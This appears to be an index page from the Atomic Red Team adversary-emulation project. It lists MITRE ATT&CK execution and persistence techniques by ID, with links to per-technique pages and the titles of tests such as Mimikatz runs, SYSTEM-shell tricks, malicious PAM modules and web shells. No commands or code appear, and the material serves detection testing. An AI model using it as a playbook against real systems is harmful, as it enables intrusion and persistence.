- T1129 Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.007 JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1121 Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1559.002 Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md)
- Atomic Test #1: Execute Commands [windows]
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
- Atomic Test #3: DDEAUTO [windows]
- [T1204.002 User Execution: Malicious File](../../T1204.002/T1204.002.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- Atomic Test #11: Mirror Blast Emulation [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique [windows]
- Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
- Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
- T1153 Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1610 Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1155 AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
- Atomic Test #1: ExecIntoContainer [containers]
- T1191 CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.001 System Services: Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1559.003 XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- Atomic Test #2: PDQ Deploy RAT [windows]
- [T1059.001 Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: Run BloodHound from local disk [windows]
- Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
- Atomic Test #4: Obfuscation Tests [windows]
- Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #6: Invoke-AppPathBypass [windows]
- Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #11: PowerShell Fileless Script Execution [windows]
- Atomic Test #12: PowerShell Downgrade Attack [windows]
- Atomic Test #13: NTFS Alternate Data Stream Access [windows]
- Atomic Test #14: PowerShell Session Creation and Use [windows]
- Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
- Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
- Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- Atomic Test #19: PowerShell Command Execution [windows]
- Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
- Atomic Test #21: PowerUp Invoke-AllChecks [windows]
- Atomic Test #22: Abuse Nslookup with DNS Records [windows]
- T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- Atomic Test #3: Harvest SUID executable files [linux]
- Atomic Test #4: LinEnum tool execution [linux]
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts (Linux) [linux]
- Atomic Test #3: Execute Python via Python executables (Linux) [linux]
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.003 Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- Atomic Test #2: Writes text to a file and displays it. [windows]
- Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
- Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
- Atomic Test #5: Command Prompt read contents from CMD file and execute [windows]
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.005 Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- Atomic Test #3: Extract Memory via VBA [windows]
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1173 Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.002 System Services: Service Execution](../../T1569.002/T1569.002.md)
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- Atomic Test #3: psexec.py (Impacket) [linux]
- Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1086 PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- T1156 Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1067 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.013 Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1501 Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1163 Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
- T1180 Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137 Office Application Startup](../../T1137/T1137.md)
- Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137.006 Office Application Startup: Add-ins](../../T1137.006/T1137.006.md)
- Atomic Test #1: Code Executed Via Excel Add-in File (Xll) [windows]
- [T1505.002 Server Software Component: Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1162 Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1505.005 Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1547.010 Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1062 Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1131 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1505.003 Server Software Component: Web Shell](../../T1505.003/T1505.003.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
- Atomic Test #1: Create a new time provider [windows]
- Atomic Test #2: Edit an existing time provider [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1031 Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a MacOS system [macos]
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- Atomic Test #6: Create a new Windows admin user [windows]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
- Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
- T1019 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1042 Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
- Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
- Atomic Test #1: Create registry persistence via AppCert DLL [windows]
- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
- Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
- Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
- Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
- Atomic Test #3: Windows MOFComp.exe Load MOF File [windows]
- T1060 Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1023 Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.001 Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1015 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistance via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- Atomic Test #10: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value [windows]
- Atomic Test #11: Change Startup Folder - HKCU Modify User Shell Folders Startup Value [windows]
- Atomic Test #12: HKCU - Policy Settings Explorer Run Key [windows]
- Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
- Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
- Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value [windows]
- Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- Atomic Test #4: Azure - adding user to Azure AD role [azure-ad]
- Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad]
- Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
- Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
- Atomic Test #8: AzureAD - adding permission to application [azure-ad]
- Atomic Test #9: Password Change on Directory Service Restore Mode (DSRM) Account [windows]
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
